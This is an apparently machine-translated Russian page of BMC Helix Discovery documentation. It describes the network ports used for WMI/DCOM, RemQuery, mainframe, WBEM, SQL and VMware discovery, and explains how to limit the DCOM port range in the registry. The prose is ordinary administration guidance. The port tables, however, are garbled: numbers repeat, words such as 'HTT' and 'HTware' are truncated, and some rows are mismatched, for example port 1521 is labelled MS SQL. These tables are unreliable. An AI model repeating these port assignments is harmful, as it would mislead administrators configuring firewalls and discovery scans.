Все сообщения WMI от BMC Helix Discovery отправляются с включенной конфиденциальностью пакетов. Если обнаруживаемый узел не поддерживает конфиденциальность пакетов, флаг игнорируется, и WMI возвращает запрошенную информацию (например, если вы используете более раннюю версию, чем Windows Server 2003 с пакетом обновления 1 (SP1)).В случаях, когда указан диапазон, один из портов используется после первоначального согласования.

По умолчанию WMI (DCOM) использует случайно выбранный порт TCP между 1024 и 65535. Чтобы упростить настройку брандмауэра, следует ограничить это использование при сканировании через брандмауэры. Для получения дополнительной информации см. Настройку диапазона порта DCOM.

Порты, используемые методами обнаружения WMI, и соответствующие назначенные порты описаны в следующей таблице.

Номер порта

Назначение порта

135

DCE RPC

DCE RPC Endpoint Manager1
DCOM Service Control

DCOM с ограниченным доступом

49152-65535

Неограниченный DCOM

139

Netbios Session Service

Netbios Session Service

Netbios Session Service

Домены в стиле Windows NT4 и NT4 (WMI)

TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD (например, в домене, запущенном с использованием Samba 3. x или более ранней версии).

TCP 139 - это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.

Запросы WMI от Windows Server 2008 к хосту Windows NT4 завершаются ошибкой при использовании настроек безопасности по умолчанию. На прокси-узле Windows отключите требование 128-битной безопасности в политике Network security: Minimum session security for NTLM SSP (включая RPC) для клиентов, чтобы это разрешить.

Диапазон портов DCOM

WMI основан на объектной модели распределенных компонентов (DCOM), которая по умолчанию использует для связи случайно выбранный порт TCP от 1024 до 65535. Чтобы сделать это более эффективным для брандмауэров, диапазон можно ограничить, используя следующую процедуру на каждом целевом хосте. Дополнительные сведения об этой проблеме см. В разделе Как настроить динамическое выделение портов RPC для работы с брандмауэрами.

Эти настройки должны быть ограничены на целевом хосте, а не на хосте BMC Helix Outpost.


Чтобы установить диапазон порта DCOM:.

  1. С помощью редактора реестра создайте раздел HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Rpc \ Internet
  2. Внутри этого раздела создайте REG_MULTI_SZ (многострочное значение) с именем Ports.
  3. Укажите порт или диапазон портов для использования.
    Прокси-сервер Windows использует только один порт. Однако, если у пользователя есть другие приложения DCOM, используемые на этом компьютере, вам может потребоваться включить больший диапазон.
  4. Создайте REG_SZ (строковое значение) с именем PortsInternetAvailable и присвойте ему значение Y .
  5. Создайте REG_SZ (строковое значение) с именем UseInternetPorts и присвойте ему значение Y .
  6. Перезагрузите компьютер.

RemQuery

Хотя WMI является стандартным механизмом для удаленного опроса системы и управления ею от Microsoft. Однако некоторые операции с помощью WMI невозможны. В первую очередь данные netstat при обнаружении ядра и выполнении любых дополнительных команд или извлечении содержимого файла с помощью шаблонов. Без RemQuery невозможно определить информацию о сетевом подключении для цели обнаружения, обмен данными между этим хостом и другими, а также моделирование приложений на основе сетевых подключений.Дополнительные операции обнаружения с использованием RemQuery обычно предназначены для более глубокого обнаружения, моделирования и управления версиями программного обеспечения.

RemQuery - это служебная программа BMC Helix Discovery, использующая тот же базовый подход, что и инструмент Microsoft PSExec. Прокси-сервер копирует исполняемый файл RemQuery в общий ресурс ADMIN $ на целевом компьютере. Доступ администратора Windows необходим для записи в общий ресурс ADMIN $ и запуска службы RemQuery. После запуска службы на целевом сервере прокси-сервер отправляет свой открытый ключ службе RemQuery, которая генерирует ключ шифрования, шифрует его полученным открытым ключом и затем отправляет обратно.Затем прокси восстанавливает ключ шифрования, используя свой закрытый ключ. С этого момента вся связь через прокси-сервер с RemQuery будет защищена с помощью ключа шифрования и соответствующего алгоритма, в зависимости от целевой системы. Обнаружение RemQuery использует шифрование AES с 256-битным ключом. AES не поддерживается в Windows 2000, поэтому обнаружение RemQuery возвращается к шифрованию DES. Windows NT не поддерживает AES или DES, поэтому обнаружение RemQuery не зашифровано. Прокси-сервер связывается со службой RemQuery с помощью именованного канала.Этот канал защищен, поэтому к нему может получить доступ только администратор.

Порты, используемые при обнаружении RemQuery, и соответствующие назначения портов описаны в следующей таблице.

Номер порта

Назначение порта

139

Netbios Session Service

Netbios Session Service

Служба сессий Microsoft

Домены в стиле Windows NT4 и NT4 (RemQuery)

TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD, например, в домене, запущенном с использованием Samba 3.x или более ранней версии.

TCP 139 - это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.

Порты мэйнфрейма, используемые для обнаружения

Единственный порт, необходимый для обнаружения мэйнфрейма, - это 3940 TCP. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.

Порты WBEM, используемые для обнаружения

Порты по умолчанию, используемые для обнаружения WBEM, описаны в следующей таблице. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.

Номер порта

Назначение порта

5988

HTTP

5989

HTT В следующих разделах содержится подробная информация о портах для расширенных типов обнаружения.

Обнаружение SQL

Информация о порте, используемая для обнаружения SQL, получена из шаблонов, используемых для обнаружения конкретной базы данных. Это зависит от способа настройки баз данных в вашей организации. В следующей таблице приведены порты по умолчанию.

Номер порта

Назначение порта

Использование

1521

1521

SQL

MS SQL

4100

SQL

Sybase ASE

3306

3306

3306

2 Обнаружение VMware ESX / ESXi с помощью vCenter

Порты, необходимые для обнаружения хостов VMware ESX / ESXi с помощью vCenter, перечислены в следующей таблице.

Обнаружение vCenter

Обнаружение vCenter использует стандартное обнаружение хоста с созданием vCenter SI, запускаемого на обнаруженном процессе vCenter.

Номер порта

Назначение порта

Использовать

443

443

443

HTware

Обнаружение VMware ESX / ESXi с помощью vSphere

Порты, необходимые для обнаружения хостов VMware ESX / ESXi, перечислены в следующей таблице.

Номер порта

Назначение порта

Использовать

443

HTTPS

HTTPS

HTTPS

VMware vSphere API

VMware ESX / ESXi

.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *